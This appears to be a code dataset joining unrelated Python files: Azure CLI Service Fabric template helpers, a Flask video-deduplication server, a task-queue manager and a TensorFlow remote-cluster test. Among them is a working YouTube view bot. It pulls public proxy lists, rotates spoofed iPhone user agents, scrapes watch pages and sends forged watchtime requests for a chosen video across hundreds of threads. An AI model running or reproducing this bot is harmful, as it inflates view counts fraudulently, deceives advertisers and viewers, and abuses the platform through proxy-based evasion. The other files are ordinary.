template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
if "Datacenter-Core-1709" in os_type:
parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
return parameters
def _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
cli_ctx = cli_ctx
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
logger.info('Primary certificate parameters are not present in parameters file')
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
main.py | import os
import random
import string
import threading
import time
from queue import Queue
import platform
import requests
from colorama import Fore, init
intro = """
███████╗████████╗██████╗ ███████╗ █████╗ ███╗ ███╗ ██████╗ ██████╗ ████████╗████████╗███████╗██████╗
██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗████╗ ████║ ██╔══██╗██╔═══██╗╚══██╔══╝╚══██╔══╝██╔════╝██╔══██╗
███████╗ ██║ ██████╔╝█████╗ ███████║██╔████╔██║█████╗██████╔╝██║ ██║ ██║ ██║ █████╗ ██████╔╝
╚════██║ ██║ ██╔══██╗██╔══╝ ██╔══██║██║╚██╔╝██║╚════╝██╔══██╗██║ ██║ ██║ ██║ ██╔══╝ ██╔══██╗
███████║ ██║ ██║ ██║███████╗██║ ██║██║ ╚═╝ ██║ ██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║
╚══════╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
https://github.com/SquirkHades/youtube-view-bot/
"""
print(intro)
if platform.system() == "Windows": #checking OS
clear = "cls"
else:
clear = "clear"
iPhone_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1")
proxy_loading = input("[1] Load Proxys from APIs\n[2] Load Proxys from proxys.txt\n")
token = input("ID of your video/live")
class main(object):
def __init__(self):
self.combolist = Queue()
self.Writeing = Queue()
self.printing = []
self.botted = 0
self.combolen = self.combolist.qsize()
def printservice(self): #print screen
while True:
if True:
os.system(clear)
print(Fore.LIGHTCYAN_EX + intro + Fore.LIGHTMAGENTA_EX)
print(
Fore.LIGHTCYAN_EX + f"Botted:{self.botted}\n")
for i in range(len(self.printing) - 10, len(self.printing)):
try:
print(self.printing[i])
except (ValueError, Exception):
pass
time.sleep(0.5)
a = main()
class proxy():
global proxy_loading
def update(self):
while True:
if proxy_loading == "2":
data = ''
data = open("proxys.txt", "r").read()
self.splited += data.split("\n") #scraping and splitting proxies
else:
data = ''
urls = ["https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt","https://api.proxyscrape.com/?request=getproxies&proxytype=http&timeout=10000&ssl=yes","https://www.proxy-list.download/api/v1/get?type=https&anon=elite"]
for url in urls:
try:
data += requests.get(url).text
self.splited += data.split("\n")
self.splited = [s.replace('\r', "") for s in self.splited]
except:
print("Proxy loading failed!")
pass
time.sleep(600)
def get_proxy(self):
random1 = random.choice(self.splited) #choose a random proxie
return random1
def FormatProxy(self):
proxyOutput = {'https' :'https://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target=self.update).start()
time.sleep(3)
proxy1 = proxy()
def bot():
while True:
try:
ua = random.choice(iPhone_UA)
s = requests.session()
random_proxy = proxy1.FormatProxy()
resp = s.get("https://m.youtube.com/watch?v=" + token + "?disable_polymer=1",headers={'Host': 'm.youtube.com', 'Proxy-Connection': 'Keep-Alive', 'User-Agent': ua, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache'},proxies=random_proxy) # simple get request to youtube for the base URL
url = resp.text.split(r'videostatsWatchtimeUrl\":{\"baseUrl\":\"')[1].split(r'\"}')[0].replace(r"\\u0026",r"&").replace('%2C',",").replace("\/","/") #getting the base url for parsing
cl = url.split("cl=")[1].split("&")[0] #parsing some infos for the URL
ei = url.split("ei=")[1].split("&")[0]
of = url.split("of=")[1].split("&")[0]
vm = url.split("vm=")[1].split("&")[0]
s.get("https://s.youtube.com/api/stats/watchtime?ns=yt&el=detailpage&cpn=isWmmj2C9Y2vULKF&docid=" + token + "&ver=2&cmt=7334&ei=" + ei + "&fmt=133&fs=0&rt=1003&of=" + of +"&euri&lact=4418&live=dvr&cl=" + cl + "&state=playing&vm=" + vm + "&volume=100&c=MWEB&cver=2.20200313.03.00&cplayer=UNIPLAYER&cbrand=apple&cbr=Safari%20Mobile&cbrver=12.1.15E148&cmodel=iphone&cos=iPhone&cosver=12_2&cplatform=MOBILE&delay=5&hl=ru&cr=GB&rtn=1303&afmt=140&lio=1556394045.182&idpj=&ldpj=&rti=1003&muted=0&st=7334&et=7634",headers={'Host': 's.youtube.com', 'Proxy-Connection': 'Keep-Alive', 'User-Agent': ua, 'Accept': 'image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5', 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': 'https://m.youtube.com/watch?v=' + token},proxies=random_proxy) # API GET request
a.botted += 1
except:
pass
maxthreads = int(input("How many Threads? Recommended: 500 - 1000\n"))
threading.Thread(target=a.printservice).start()
num = 0
while num < maxthreads :
num += 1
threading.Thread(target=bot).start()
threading.Thread(target=bot).start()
|
main.py | import threading
from os import path
import eventlet
import fire
from flask import Flask
from server.config import Config
from server.socket.log_watcher import LogWatcher
from server.socket.task_observer import TaskObserver
from template_support.file_storage import LocalFileStorage
from thumbnail.cache import ThumbnailCache
def _setup_frontend(app, basename=""):
"""Setup routing for single-page frontend"""
@app.route(path.join(basename, "/"), defaults={"_": None})
@app.route(path.join(basename, "/<path:_>"))
def frontend(_):
return app.send_static_file("index.html")
def create_application(config):
"""Create configured flask application."""
from server.api import api as api_blueprint
app = Flask(__name__, static_url_path="/static", static_folder=path.abspath(config.static_folder))
app.debug = False
app.config["SQLALCHEMY_DATABASE_URI"] = config.database.uri
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["MAX_CONTENT_LENGTH"] = config.max_upload_size
app.config["CONFIG"] = config
app.config["THUMBNAILS"] = ThumbnailCache(
directory=config.thumbnail_cache_folder, capacity=config.thumbnail_cache_cap
)
app.register_blueprint(api_blueprint, url_prefix="/api/v1")
_setup_frontend(app)
return app
def serve(
host=None,
port=None,
db_host=None,
db_port=None,
db_name=None,
db_user=None,
db_secret=None,
db_dialect=None,
db_uri=None,
static=None,
videos=None,
):
"""Start Deduplication API Server."""
eventlet.monkey_patch()
from server.model import database
from server.queue.instance import request_transformer
from server.socket.instance import socketio
from server.queue import make_task_queue, make_log_storage
# Read configuration
config = Config()
config.port = port or config.port
config.host = host or config.host
config.video_folder = videos or config.video_folder
config.static_folder = static or config.static_folder
config.database.port = db_port or config.database.port
config.database.host = db_host or config.database.host
config.database.name = db_name or config.database.name
config.database.user = db_user or config.database.user
config.database.secret = db_secret or config.database.secret
config.database.dialect = db_dialect or config.database.dialect
config.database.override_uri = db_uri or config.database.override_uri
# Create application
application = create_application(config)
# Initialize database
database.init_app(application)
# Initialize file storage
application.config["APP_FILE_STORAGE"] = LocalFileStorage(directory=config.file_store_directory)
# Initialize task queue
task_queue = make_task_queue(config, request_transformer)
application.config["TASK_QUEUE"] = task_queue
# Initialize SocketIO
socketio.init_app(application)
task_queue.observe(TaskObserver(socketio))
# Initialize task log storage
log_storage = make_log_storage(config, task_queue)
application.config["LOG_STORAGE"] = log_storage
# Initialize task log watcher
log_watcher = LogWatcher(socketio=socketio, log_storage=log_storage)
application.config["LOG_WATCHER"] = log_watcher
# Listen for task queue events in a background thread
threading.Thread(target=task_queue.listen, daemon=True).start()
# Publish log updates in a background thread
threading.Thread(target=log_watcher.broadcast_logs, daemon=True).start()
# Serve REST API
socketio.run(application, host=config.host, port=config.port, log_output=True)
if __name__ == "__main__":
fire.Fire(serve)
|
TaskManager.py | # coding=utf-8
import threading
import time
import tool.tools as tool
from task import Task
from parser.ParserManager import ParserManager
from ui.presenter import dbPresenter
LOG_TAG = "TaskManager"
class TaskQueue(object):
"""
任务队列,基类
"""
def __init__(self):
self._queue = []
def put(self, t):
self._queue.insert(0, t)
def get_header_load(self):
return self._queue[len(self._queue)-1].getLoad()
def get(self):
return self._queue.pop(len(self._queue)-1)
def size(self):
return len(self._queue)
class ProcessingTaskQueue(TaskQueue):
"""
正在处理任务队列
"""
def __init__(self):
super(ProcessingTaskQueue, self).__init__()
def get_load_sum(self):
"""
获取任务总量
"""
load_sum = 0
for t in self._queue:
load_sum += t.getLoad()
tool.log(LOG_TAG, "load_sum = %d" % load_sum)
return load_sum
def put(self, t):
if type(t) is Task:
t.state = Task.__STATE_PROCESSING__
super(ProcessingTaskQueue, self).put(t)
# 数据库操作,更新task的状态 => Processing
# dbPresenter.UpdateTaskState(t.log_path, Task.__STATE_PROCESSING__)
def remove(self, t):
if t in self._queue:
self._queue.remove(t)
def remove_by_id(self, qid):
for t in self._queue:
if t.name == qid:
self._queue.remove(t)
return
class WaitingTaskQueue(TaskQueue):
"""
正在等待任务队列
"""
def __init__(self):
super(WaitingTaskQueue, self).__init__()
def put(self, t):
p = False
if type(t) is Task and t.state != Task.__STATE_WAITING__:
t.state = Task.__STATE_WAITING__
# 数据库操作,更新task的状态 => Waiting
# p = dbPresenter.UpdateTaskState(t.log_path, Task.__STATE_WAITING__)
super(WaitingTaskQueue, self).put(t)
return p
# -------------------------------------------------------------------------------
class TaskListener(object):
"""
The task state and progress changed listener
Called By ParserManager
Realized By Presenter
Task 状态和进度监听
由ParserManager调用,由Presenter实现
"""
def on_task_progress_changed(self, task, progress):
"""
The callback called when task progress changed
:param task: target task for identity
:param progress: the progress of target task
"""
def on_task_state_changed(self, task):
"""
The callback called when task state changed
:param task: the target task
"""
# -------------------------------------------------------------------------------
class TaskManager(object):
"""
单例模式:TaskManager, 用于统一管理和调度任务
流程:
1、当processing queue中没有任务,来任务直接加入其中
2、当processing queue中有任务,判断从waiting queue中取出的task的load和 processing queue中所有task的load和是否大于MAX,
如果是,则waiting
如果否, 则进入processing queue
3、当从ParserManager收到对应Task完成的反馈, 则在processing queue中移除此task
"""
# TODO 可以从配置文件中获取
# 代表着最多可同时开启50个线程处理任务。
_MAX_PROCESSING_ = 50
instance = None
_waitingQueue = None
_processingQueue = None
_task_handler = None
_running = False
_task_listener = None
def __new__(cls, *args, **kwargs):
if not cls.instance:
cls.instance = super(TaskManager, cls).__new__(cls, *args, **kwargs)
cls._waitingQueue = WaitingTaskQueue()
cls._processingQueue = ProcessingTaskQueue()
cls._running = True
cls._task_handler = None
cls._task_listener = None
return cls.instance
# public
def start(self):
if not self._task_handler:
self._task_handler = threading.Thread(target=self._handle_tasks)
self._task_handler.start()
def add_task(self, task):
self._waitingQueue.put(task)
def close(self):
self._running = False
self._waitingQueue = None
self._processingQueue = None
self._task_handler = None
self.instance = None
def set_task_listener(self, l):
self._task_listener = l
# private
def _handle_tasks(self):
tool.log(LOG_TAG, "_handle_tasks start")
while self._running:
# 1秒一次的轮询
time.sleep(1)
# 如果等待队列中没有任务, 则继续
if self._waitingQueue.size() <= 0:
continue
# 当处理队列中有任务的时候,计算当前的总工作量,用以确定TaskManager是否还能承受
if self._processingQueue.size() > 0:
# 当前任务量
current_load = self._processingQueue.get_load_sum()
# 下一个任务的任务量
future_load = self._waitingQueue.get_header_load()
# 如果两者相加没超过总任务量, 则运行
if current_load + future_load <= TaskManager._MAX_PROCESSING_:
# 将等待队列的任务放入处理队列,并启动进程池执行任务
t = self._waitingQueue.get()
self._processingQueue.put(t)
pm = ParserManager(t)
if self._task_listener:
pm.set_task_listener(self._task_listener)
pm.execute()
tool.log(LOG_TAG, "_handle_tasks: start ParserManager 1")
else:
tool.log(LOG_TAG, "_handle_tasks: please hold on")
else:
# 如果当前处理队列中没有任务, 直接从等待队列中拿出一个任务放到处理队列
task = self._waitingQueue.get()
# 计算任务量
task.getLoad()
self._processingQueue.put(task)
if self._task_listener:
self._task_listener.on_task_state_changed(task)
tool.log(LOG_TAG, "tagggggggggggggggg")
tool.log(LOG_TAG, "state = %d" % task.state)
# 启动任务
pm = ParserManager(task)
pm.set_task_listener(self._task_listener)
pm.execute()
|
remote_cluster_test.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for remote eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import cluster_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import executor
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import server_lib
JOB_NAME = "remote_device"
def get_server_def(job_name, local_server_port, remote_server_addresses,
task_index):
"""Returns a server def with a single job + multiple tasks."""
cluster_def = cluster_pb2.ClusterDef()
job_def = cluster_def.job.add()
job_def.name = job_name
job_def.tasks[0] = "localhost:%d" % local_server_port
for i, remote_server_address in enumerate(remote_server_addresses, start=1):
job_def.tasks[i] = remote_server_address
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_def,
job_name=job_name,
task_index=task_index,
protocol="grpc")
return server_def
class DynamicClusterTest(test.TestCase, parameterized.TestCase):
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(DynamicClusterTest, self).__init__(methodName)
self._cached_server1 = server_lib.Server.create_local_server()
self._cached_server2 = server_lib.Server.create_local_server()
self._cached_server3 = server_lib.Server.create_local_server()
self._cached_server4 = server_lib.Server.create_local_server()
self._cached_server1_target = self._cached_server1.target[len("grpc://"):]
self._cached_server2_target = self._cached_server2.target[len("grpc://"):]
self._cached_server3_target = self._cached_server3.target[len("grpc://"):]
self._cached_server4_target = self._cached_server4.target[len("grpc://"):]
self.server_def_s1 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[self._cached_server1_target],
task_index=0)
self.server_def_s1_s2 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target
],
task_index=0)
self.server_def_s1_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server3_target
],
task_index=0)
self.server_def_s4_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server4_target, self._cached_server3_target
],
task_index=0)
self.server_def_s1_s2_s3 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target,
self._cached_server3_target
],
task_index=0)
self.server_def_s1_s2_s3_s4 = get_server_def(
JOB_NAME,
local_server_port=0,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target,
self._cached_server3_target, self._cached_server4_target
],
task_index=0)
self.device_local = "/job:%s/replica:0/task:0/device:CPU:0" % JOB_NAME
self.device_t1 = "/job:%s/replica:0/task:1/device:CPU:0" % JOB_NAME
self.device_t2 = "/job:%s/replica:0/task:2/device:CPU:0" % JOB_NAME
self.device_t3 = "/job:%s/replica:0/task:3/device:CPU:0" % JOB_NAME
self.device_t4 = "/job:%s/replica:0/task:4/device:CPU:0" % JOB_NAME
def setUp(self):
super(DynamicClusterTest, self).setUp()
os.environ["TF_ENABLE_EAGER_CLIENT_STREAMING_ENQUEUE"] = str(False)
local_port = pywrap_tfe.TF_PickUnusedPortOrDie()
context.set_server_def(
server_def=get_server_def(
JOB_NAME,
local_server_port=local_port,
remote_server_addresses=[
self._cached_server1_target, self._cached_server2_target
],
task_index=0))
def tearDown(self):
super(DynamicClusterTest, self).tearDown()
ops.device(None).__enter__()
context._reset_context()
@test_util.run_in_async_and_sync_mode
def testServerAdded(self):
"""Add a server to cluster, and run remote ops on it."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
x2 = array_ops.ones([2, 2])
# Test new server accessing resources on old server
with ops.device(self.device_t3):
y = math_ops.matmul(x1, x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
# Test old server accessing resources on new server
with ops.device(self.device_t2):
y = math_ops.matmul(x1, x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testServerRemoved(self):
"""Remove a server from cluster, and run ops on cluster."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
with ops.device(self.device_t2):
x2 = array_ops.ones([2, 2])
with ops.device(self.device_t1):
y = math_ops.matmul(x1, x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
context.update_server_def(server_def=self.server_def_s1)
with ops.device(self.device_t1):
y = math_ops.matmul(x1, x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
# Running ops on removed server s2 throws an exception
with self.assertRaises(errors.InvalidArgumentError) as cm:
with ops.device(self.device_t2):
y = math_ops.matmul(x1, x2)
self.assertIn("unknown device", cm.exception.message)
# TODO(haoyuzhang): raise and catch exception when accessing tensors on
# the removed servers.
@test_util.run_in_async_and_sync_mode
def testServerReplaced(self):
"""Replace remote host_port for a task, and run ops on cluster."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
context.update_server_def(server_def=self.server_def_s1_s3)
with ops.device(self.device_t2):
y = math_ops.matmul(x1, x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerAdded(self):
"""Add a server to cluster, and run remote function on it."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
with ops.device(self.device_t3):
x2 = array_ops.ones([2, 2])
with ops.device(self.device_t1):
y = worker_fn(x2)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerRemoved(self):
"""Remove a server from cluster, and run ops on cluster."""
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1)
with ops.device(self.device_t1):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
# Running functions on removed server s2 throws an exception
with self.assertRaises(errors.InvalidArgumentError) as cm:
with ops.device(self.device_t2):
y = worker_fn(x1)
self.assertIn(" unknown device", cm.exception.message)
# TODO(haoyuzhang): raise and catch exception when accessing tensors on
# the removed servers.
@test_util.run_in_async_and_sync_mode
def testFunctionServerRemovedAddedBack(self):
"""Add and remove a server, and run functions on cluster."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
context.update_server_def(server_def=self.server_def_s1_s2)
with ops.device(self.device_t2):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionServerReplaced(self):
"""Replace remote host_port for a task, and run functions on cluster."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1_s3)
with ops.device(self.device_t2):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testFunctionRegisteredAndRemoved(self):
"""Update cluster when other function are registered and removed."""
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
num_calls = 30
self._coord = coordinator.Coordinator()
def update_server_def_fn():
with self._coord.stop_on_exception():
for i in range(num_calls):
context.update_server_def(
server_def=(self.server_def_s1_s2 if i %
2 == 0 else self.server_def_s1_s3))
t = threading.Thread(target=update_server_def_fn)
t.start()
for _ in range(num_calls):
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
concrete_fn = worker_fn.get_concrete_function(x1)
del concrete_fn
del worker_fn
# No exception should be thrown from the thread
self._coord.join([t])
def testPendingNodesServerReplaced(self):
"""Update cluster when nodes are still pending on remote workers."""
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
# Add enough ops so they are pending when changing the cluster
num_nodes = 10
ret = [None] * num_nodes
for i in range(num_nodes):
with ops.device(self.device_t1):
ret[i] = worker_fn(x1)
# While nodes are still pending on worker s1, replace worker s2 with s3.
context.update_server_def(server_def=self.server_def_s1_s3)
with ops.device(self.device_t2):
y = worker_fn(x1)
for i in range(num_nodes):
np.testing.assert_array_equal([[2, 2], [2, 2]], ret[i].numpy())
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testMultiThreadPendingNodesServerReplaced(self):
"""Update cluster when other remote function calls are being launched."""
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
num_calls = 10
lock = threading.Lock()
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
def thread_fn(device, results):
for i in range(num_calls):
lock.acquire()
with ops.device(device):
y = worker_fn(x1)
results[i] = y.numpy()
lock.release()
def update_server_def_fn():
for i in range(num_calls):
lock.acquire()
context.update_server_def(
server_def=(self.server_def_s1_s2 if i %
2 == 0 else self.server_def_s1_s3))
lock.release()
t1_results = [None] * num_calls
t2_results = [None] * num_calls
threads = []
threads.append(
threading.Thread(target=thread_fn, args=(self.device_t1, t1_results)))
threads.append(
threading.Thread(target=thread_fn, args=(self.device_t2, t2_results)))
threads.append(threading.Thread(target=update_server_def_fn))
for t in threads:
t.start()
for t in threads:
t.join()
for result in t1_results + t2_results:
np.testing.assert_array_equal([[2, 2], [2, 2]], result)
def testMultiThreadPendingNodesLockFree(self):
"""Update cluster when other remote function calls are being launched."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
num_calls = 10
self._coord = coordinator.Coordinator()
@def_function.function
def worker_fn(i):
return math_ops.matmul(i, i)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
def thread_fn(device, results):
for i in range(num_calls):
with self._coord.stop_on_exception():
with ops.device(device):
results[i] = worker_fn(x1).numpy()
def update_server_def_fn():
for _ in range(30):
with self._coord.stop_on_exception():
context.update_server_def(self.server_def_s1_s2)
t1_results = [None] * num_calls
t2_results = [None] * num_calls
threads = []
threads.append(
threading.Thread(target=thread_fn, args=(self.device_t1, t1_results)))
threads.append(
threading.Thread(target=thread_fn, args=(self.device_t2, t2_results)))
threads.append(threading.Thread(target=update_server_def_fn))
for t in threads:
t.start()
